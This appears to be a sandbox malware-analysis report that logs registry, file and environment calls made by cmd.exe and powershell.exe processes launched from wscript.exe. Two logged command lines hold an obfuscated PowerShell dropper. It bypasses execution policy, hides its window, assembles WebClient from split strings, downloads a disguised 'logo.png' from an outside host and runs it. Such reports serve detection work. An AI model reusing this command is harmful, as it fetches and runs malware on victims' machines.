Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xc64, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #39: cmd.exe

57

0

»

Information	Value
ID	#39
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:01:59, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:25

OS Process Information

»

Information	Value
PID	0xc04
Parent PID	0xb6c (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C08

Threads

Thread 0xc08

57

0

»

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 2019-07-26 16:47:03 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 190960	1	Fn
System	Get Time	type = Performance Ctr, time = 24552336016	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4ac50000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x77056d40	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 24, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Set Environment String	name = =C:, value = C:\Users\aETAdzjz\Documents	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x77040000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x770523d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x77048290	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x770517e0	1	Fn
Environment	Get Environment String	name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp	2	Fn
File	Open	filename = STD_ERROR_HANDLE	1	Fn
File	Get Info	filename = STD_ERROR_HANDLE, type = file_type	1	Fn
File	Open	filename = STD_ERROR_HANDLE	2	Fn
Process	Create	process_name = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, os_pid = 0xc5c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data

Process #40: powershell.exe

295

0

»

Information	Value
ID	#40
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory	C:\Users\aETAdzjz\Documents\
Monitor	Start Time: 00:02:01, Reason: Child Process
Unmonitor	End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration	00:02:24

OS Process Information

»

Information	Value
PID	0xc54
Parent PID	0x8c0 (c:\windows\system32\wscript.exe)
Bitness	64-bit
Is Created or Modified Executable
Integrity Level	Medium
Username	YKYD69Q\aETAdzjz
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x C58 0x C74 0x C84 0x CA0 0x CA8 0x CC8 0x CCC

Memory Dumps

»

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
buffer	0x7FF00181000	0x7FF00181FFF	First Execution	-	64-bit	0x7FF00181032	... Region Actions Download Dump
powershell.exe	0x13FF20000	0x13FF96FFF	Relevant Image	-	64-bit	-	... Region Actions Download Dump
buffer	0x02C5B000	0x02C67FFF	First Execution	-	64-bit	0x02C664E0, 0x02C67308, ...	... Region Actions Download Dump
buffer	0x7FF0010B000	0x7FF0010BFFF	First Execution	-	64-bit	0x7FF0010B000	... Region Actions Download Dump
buffer	0x7FF00135000	0x7FF00135FFF	First Execution	-	64-bit	0x7FF0013507D	... Region Actions Download Dump
buffer	0x7FF00133000	0x7FF00133FFF	First Execution	-	64-bit	0x7FF001335FD	... Region Actions Download Dump
buffer	0x7FF00136000	0x7FF00136FFF	First Execution	-	64-bit	0x7FF0013607D	... Region Actions Download Dump
buffer	0x7FF0010E000	0x7FF0010EFFF	First Execution	-	64-bit	0x7FF0010E820	... Region Actions Download Dump
buffer	0x7FF00270000	0x7FF00270FFF	First Execution	-	64-bit	0x7FF00270130	... Region Actions Download Dump

Threads

Thread 0xc58

260

0

»

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	11	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Set Environment String	name = PSExecutionPolicyPreference, value = Bypass	1	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = Media Center	1	Fn
Registry	Open Key	reg_name = Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = OAlerts	1	Fn
Registry	Open Key	reg_name = OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = Security	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Environment	Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Environment	Get Environment String	name = HOMEPATH, result_out = \Users\aETAdzjz	1	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	1	Fn
File	Get Info	filename = C:\, type = file_attributes	4	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
User	Get Username	user_name_out = aETAdzjz	2	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
User	Get Username	user_name_out = aETAdzjz	1	Fn
Environment	Get Environment String	name = MshEnableTrace	5	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Get Info	filename = C:\, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz\Documents, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users, type = file_attributes	2	Fn
File	Get Info	filename = C:\Users\aETAdzjz, type = file_attributes	2	Fn
